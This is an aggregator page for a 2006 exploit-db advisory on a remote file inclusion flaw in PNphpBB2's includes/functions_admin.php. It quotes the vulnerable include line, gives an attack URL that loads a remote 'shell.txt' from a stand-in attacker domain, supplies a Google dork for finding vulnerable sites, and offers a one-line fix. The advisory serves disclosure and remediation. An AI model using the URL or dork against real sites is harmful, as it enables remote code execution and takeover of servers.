Lucene search
+L

PNPHPBB2 < 1.2g - 'phpbb_root_path' Remote File Inclusion

🗓️ 18 Sep 2006 00:00:00Reported by AzzCoderType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 159 Views

PNPHPBB2 < 1.2g 'phpbb_root_path' Remote File Inclusion vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-4968
25 Sep 200601:00
cve
cvelist
Cvelist
CVE-2006-4968
25 Sep 200601:00
cvelist
euvd
EUVD
EUVD-2006-4954
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-4968
25 Sep 200601:07
nvd
nessus
Tenable Nessus
PostNuke PNphpBB2 includes/functions_admin.php phpbb_root_path Parameter Remote File Inclusion
27 Mar 200600:00
nessus
Yeah, another ZeroDay Smile

Vendor: http://www.pnphpbb.com/

Vulnerable File: includes/functions_admin.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );

Method To Use:

http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?

How To Fix:

Add this code before the include
Code:
if ( !defined('IN_PHPBB') )
{
   die("Hacking attempt");
}


Google Dork: Powered by PNphpBB2 / Powered por PNphpBB2

# milw0rm.com [2006-09-18]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Jan 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.09415
159